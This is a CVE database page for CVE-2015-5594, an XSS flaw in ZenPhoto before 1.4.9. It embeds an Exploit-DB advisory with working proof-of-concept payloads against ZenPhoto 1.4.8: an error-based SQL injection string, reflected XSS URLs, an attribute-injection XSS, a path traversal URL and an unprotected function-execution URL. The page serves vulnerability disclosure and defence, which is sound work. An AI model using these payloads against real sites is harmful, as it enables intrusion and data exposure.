CVE-2015-5594

medium

Published 2017-07-25 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

6.1

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

7.1

Description

The sanitize_string function in ZenPhoto before 1.4.9 utilized the html_entity_decode function after input sanitation, which might allow remote attackers to perform a cross-site scripting (XSS) via a crafted string.

Predictions

Exploit likelihood

71%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-37602 webapps php text · 2 KB

Tim Coen · 2015-07-13

ZenPhoto 1.4.8 - Multiple Vulnerabilities

text exploit Source: Exploit-DB

Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

  There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.

   - visit zp-core/admin-options.php?saved&tab=gallery
     alternatively visit zp-core/admin-options.php?saved&tab=image
   - Set "Sort gallery by" to "Custom"
   - set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
   - visit zp-core/admin-upload.php?page=upload&tab=http&type=images
   - alternatively, visiting either of these will also trigger the injection:
    /
    zp-core/admin-edit.php
    zp-core/admin-users.php?page=users
    zp-core/admin-themes.php

  The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs

XSS 1
=====

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

    The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

  For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

    localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/

Application impact

Vendor	Product	Versions	Fixed
zenphoto	zenphoto	`{"endIncluding":"1.4.8"}`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.